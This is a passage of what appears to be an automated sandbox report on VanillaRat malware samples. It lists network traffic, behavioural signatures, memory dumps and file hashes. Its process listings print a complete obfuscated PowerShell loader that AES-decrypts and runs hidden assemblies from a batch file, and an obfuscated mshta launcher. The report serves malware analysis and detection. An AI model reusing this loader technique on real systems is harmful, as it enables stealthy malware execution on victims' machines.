| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp |
Files
memory/2476-0-0x00000000001E0000-0x0000000000202000-memory.dmp
memory/2476-1-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp
memory/2476-2-0x000000001BEE0000-0x000000001BF60000-memory.dmp
memory/2476-3-0x000007FEF4FA0000-0x000007FEF598C000-memory.dmp
memory/2476-4-0x000000001BEE0000-0x000000001BF60000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win10v2004-20231025-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.5.248.8.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 254.105.26.67.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp |
Files
memory/2436-0-0x000001ACBDA70000-0x000001ACBDA92000-memory.dmp
memory/2436-1-0x00007FF863E80000-0x00007FF864941000-memory.dmp
memory/2436-2-0x000001ACBF7C0000-0x000001ACBF7D0000-memory.dmp
memory/2436-3-0x00007FF863E80000-0x00007FF864941000-memory.dmp
memory/2436-4-0x000001ACBF7C0000-0x000001ACBF7D0000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win10v2004-20231023-en
Max time kernel
38s
Max time network
41s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3340 created 608 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3340 set thread context of 4480 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 3340 set thread context of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Start.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
Main\\VanillaRat.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\VanillaRat\\\Handlers\\HandlerInstaller.bat' -WindowStyle Hidden -Wait}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat" "
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
"HandlerInstaller.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function VROas($YFEKm){ $EnJnq=[System.Security.Cryptography.Aes]::Create(); $EnJnq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EnJnq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EnJnq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+mgHoM3Dd8LE9FhelB1+E49NCwweh3qyJF1GxhCe+k0='); $EnJnq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wwm30jhzkHC4/5SnlEDZGA=='); $pWYkp=$EnJnq.CreateDecryptor(); $return_var=$pWYkp.TransformFinalBlock($YFEKm, 0, $YFEKm.Length); $pWYkp.Dispose(); $EnJnq.Dispose(); $return_var;}function XcsVC($YFEKm){ $zQqyq=New-Object System.IO.MemoryStream(,$YFEKm); $emglC=New-Object System.IO.MemoryStream; $RGlqr=New-Object System.IO.Compression.GZipStream($zQqyq, [IO.Compression.CompressionMode]::Decompress); $RGlqr.CopyTo($emglC); $RGlqr.Dispose(); $zQqyq.Dispose(); $emglC.Dispose(); $emglC.ToArray();}function dnTmn($YFEKm,$CaEDQ){ $NmIfY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$YFEKm); $bqkrl=$NmIfY.EntryPoint; $bqkrl.Invoke($null, $CaEDQ);}$lpRaC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat').Split([Environment]::NewLine);foreach ($aneut in $lpRaC) { if ($aneut.StartsWith('SEROXEN')) { $zZPSp=$aneut.Substring(7); break; }}$jGZnr=[string[]]$zZPSp.Split('\');$yHwYZ=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[0])));$QcHAi=XcsVC (VROas ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jGZnr[1])));dnTmn $QcHAi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dnTmn $yHwYZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{530cdb18-0153-4c86-932a-67da7ab8d141}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b562c91e-0607-4472-84bd-d9a885919306}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-MkCCpgMZesGBgQjTHDjR4312:&#<?=%
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.208.253.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
Files
memory/1136-0-0x0000000075290000-0x0000000075A40000-memory.dmp
memory/1136-1-0x00000000005E0000-0x00000000007A8000-memory.dmp
memory/4844-2-0x000001D6B8730000-0x000001D6B8740000-memory.dmp
memory/4844-3-0x000001D6B8730000-0x000001D6B8740000-memory.dmp
memory/4844-4-0x000001D6D4630000-0x000001D6D4652000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khy4anj3.5p5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1136-5-0x00000000056F0000-0x0000000005C94000-memory.dmp
memory/1136-16-0x0000000005140000-0x00000000051D2000-memory.dmp
memory/4844-15-0x00007FFFDD750000-0x00007FFFDE211000-memory.dmp
memory/1136-17-0x0000000005110000-0x0000000005120000-memory.dmp
memory/4844-18-0x000001D6B8730000-0x000001D6B8740000-memory.dmp
memory/1136-19-0x0000000005080000-0x000000000508A000-memory.dmp
memory/1136-20-0x0000000006A10000-0x0000000006AF0000-memory.dmp
memory/1136-21-0x0000000006450000-0x00000000065F6000-memory.dmp
memory/1136-22-0x0000000005110000-0x0000000005120000-memory.dmp
memory/1136-23-0x0000000075290000-0x0000000075A40000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/4844-28-0x000001D6B8730000-0x000001D6B8740000-memory.dmp
memory/4844-29-0x000001D6B8730000-0x000001D6B8740000-memory.dmp
memory/3340-39-0x00007FFFDD750000-0x00007FFFDE211000-memory.dmp
memory/3340-41-0x0000016200130000-0x0000016200140000-memory.dmp
memory/3340-40-0x0000016200130000-0x0000016200140000-memory.dmp
memory/4844-42-0x00007FFFDD750000-0x00007FFFDE211000-memory.dmp
memory/1136-43-0x0000000005110000-0x0000000005120000-memory.dmp
memory/4844-44-0x000001D6B8730000-0x000001D6B8740000-memory.dmp
memory/1136-45-0x0000000005110000-0x0000000005120000-memory.dmp
memory/3340-46-0x00007FFFDD750000-0x00007FFFDE211000-memory.dmp
memory/3340-47-0x0000016200130000-0x0000016200140000-memory.dmp
memory/3340-48-0x0000016200130000-0x0000016200140000-memory.dmp
memory/3340-49-0x0000016200080000-0x00000162000A4000-memory.dmp
memory/3340-50-0x00007FFFFBF30000-0x00007FFFFC125000-memory.dmp
memory/3340-51-0x00007FFFFB6A0000-0x00007FFFFB75E000-memory.dmp
memory/3340-52-0x000001621AA50000-0x000001621B49E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/3340-54-0x00007FFFE6C10000-0x00007FFFE6C29000-memory.dmp
memory/3340-55-0x000001621B4A0000-0x000001621B544000-memory.dmp
memory/3340-56-0x000001621B550000-0x000001621B5A6000-memory.dmp
memory/3340-57-0x000001621B5B0000-0x000001621B608000-memory.dmp
memory/3340-58-0x00000162000B0000-0x00000162000D2000-memory.dmp
memory/3340-59-0x00007FFFFBF30000-0x00007FFFFC125000-memory.dmp
memory/3340-61-0x000001621A740000-0x000001621A74A000-memory.dmp
memory/4480-63-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4480-62-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4500-64-0x0000000000400000-0x0000000000406000-memory.dmp
memory/4500-66-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-01 11:02
Reported
2023-11-01 11:05
Platform
win10v2004-20231020-en
Max time kernel
57s
Max time network
63s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3084 created 620 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\system32\winlogon.exe |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3084 set thread context of 4612 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\System32\dllhost.exe |
| PID 3084 set thread context of 884 | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | C:\Windows\SysWOW64\dllhost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat"
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Handlers\HandlerInstaller.bat.exe
